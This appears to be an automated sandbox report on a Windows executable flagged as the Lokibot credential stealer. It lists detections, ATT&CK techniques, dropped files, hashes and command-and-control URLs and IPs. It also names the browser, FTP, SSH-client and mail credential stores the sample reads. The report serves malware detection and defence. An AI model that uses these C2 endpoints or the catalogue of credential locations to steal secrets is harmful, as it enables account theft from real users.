Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.37bf1e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.37d9200.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7524, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 7716, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000003.00000002.3131214970.0000000001158000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\Desktop\file.exe	Code function: PopPassword		3_2_0040D069
Source: C:\Users\user\Desktop\file.exe	Code function: SmtpPassword		3_2_0040D069

Source: Yara match	File source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.37bf1e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.37d9200.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	2 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	111 Process Injection	11 Disable or Modify Tools	2 Credentials in Registry	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	111 Process Injection	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.Taskun
file.exe	100%	Avira	HEUR/AGEN.1306899
file.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://94.156.177.41/maxzi/five/fre.php	100%	Avira URL Cloud	malware
94.156.177.41/maxzi/five/fre.php	100%	Avira URL Cloud	malware

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	false		high
http://94.156.177.41/maxzi/five/fre.php	true	Avira URL Cloud: malware	unknown
http://alphastand.top/alien/fre.php	false		high
http://alphastand.win/alien/fre.php	false		high
http://alphastand.trade/alien/fre.php	false		high
94.156.177.41/maxzi/five/fre.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://www.apache.org/licenses/LICENSE-2.0	file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com	file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designersG	file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/?	file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn/bThe	file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers?	file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.ibsensoftware.com/	file.exe, file.exe, 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	high
http://www.tiro.com	file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers	file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.goodfont.co.kr	file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.carterandcone.coml	file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sajatypeworks.com	file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.typography.netD	file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/cabarga.htmlN	file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn/cThe	file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.galapagosdesign.com/staff/dennis.htm	file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn	file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/frere-user.html	file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.jiyu-kobo.co.jp/	file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.galapagosdesign.com/DPlease	file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers8	file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fonts.com	file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sandoll.co.kr	file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.urwpp.deDPlease	file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.zhongyicts.com.cn	file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	file.exe, 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sakkal.com	file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.156.177.41	unknown	Bulgaria		43561	NET1-ASBG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1561052
Start date and time:	2024-11-22 17:37:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/8@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 65 Number of non-executed functions: 11
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
11:38:16	API Interceptor	69x Sleep call for process: file.exe modified
11:38:19	API Interceptor	16x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
94.156.177.41	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.41/simple/five/fre.php
	stthigns.doc	Get hash	malicious	Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	goodtoseeuthatgreatthingswithentirethingsgreatfor.hta	Get hash	malicious	Cobalt Strike, Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	PO-000041492.docx.doc	Get hash	malicious	Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	ECxDwGGFH3.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/simple/five/fre.php
	greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	94.156.177.41/simple/five/fre.php
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.41/simple/five/fre.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NET1-ASBG	filepdf.pdf.lnk.download.lnk	Get hash	malicious	Unknown	Browse	94.156.177.166
	putty .exe	Get hash	malicious	DarkTortilla, SmokeLoader	Browse	94.156.177.166
	2.ps1	Get hash	malicious	Unknown	Browse	94.156.177.166
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.41
	stthigns.doc	Get hash	malicious	Lokibot	Browse	94.156.177.41
	goodtoseeuthatgreatthingswithentirethingsgreatfor.hta	Get hash	malicious	Cobalt Strike, Lokibot	Browse	94.156.177.41
	PO-000041492.docx.doc	Get hash	malicious	Lokibot	Browse	94.156.177.41
	ECxDwGGFH3.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41
	greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	94.156.177.41
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.41

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379736180876081
Encrypted:	false
SSDEEP:	48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZeUyus:tLHyIFKL3IZ2KRH9Ougos
MD5:	9D384A9EBEABB083763926A2E63505A6
SHA1:	3AB2DD8F7518A36D7E22EFD76FF25F3DFA25D889
SHA-256:	801BC488523F40135A2F58EE86844AD3AFD2EFD0AF5DD0F7DE40978E7EDE92DD
SHA-512:	03941519E7F748E7A151CDEFC2E6D98A19B2E077AB09C48822B3882D8BA39C8427A9766C26B3F28DB419385FD7F030C3A7D5FE5ADE4F796AE876921042F5FED9
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_asw2dfr5.xlk.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hoh2izgh.riv.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xfj5fqtq.f4y.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yogodoji.ewd.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	modified
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbq:4
MD5:	8CB7B7F28464C3FCBAE8A10C46204572
SHA1:	767FE80969EC2E67F54CC1B6D383C76E7859E2DE
SHA-256:	ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
SHA-512:	9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
Malicious:	false
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.913749036393697
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	file.exe
File size:	600'576 bytes
MD5:	66b03d1aff27d81e62b53fc108806211
SHA1:	2557ec8b32d0b42cac9cabde199d31c5d4e40041
SHA256:	59586e753c54629f428a6b880f6aff09f67af0ace76823af3627dda2281532e4
SHA512:	9f8ef3dd8c482debb535b1e7c9155e4ab33a04f8c4f31ade9e70adbd5598362033785438d5d60c536a801e134e09fcd1bc80fc7aed2d167af7f531a81f12e43d
SSDEEP:	12288:VrOj+Ri3AgFdZeDZskwkzA0+7xUNq4KC73vUECPnsSnR83PdB0:xQ3AgSskwZNeEqdCPssS3F
TLSH:	DFD423C93776E127D8BCD330A76250A287752D7BDB0CD65D09C9269ACFA6388C052F87
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:=g..............0...... .......&... ...@....@.. ....................................`................................

File Icon


Icon Hash:	8bdb4b414d656d61

Static PE Info

General

Entrypoint:	0x4926e6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x673D3AED [Wed Nov 20 01:27:09 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x92694	0x4f	.text
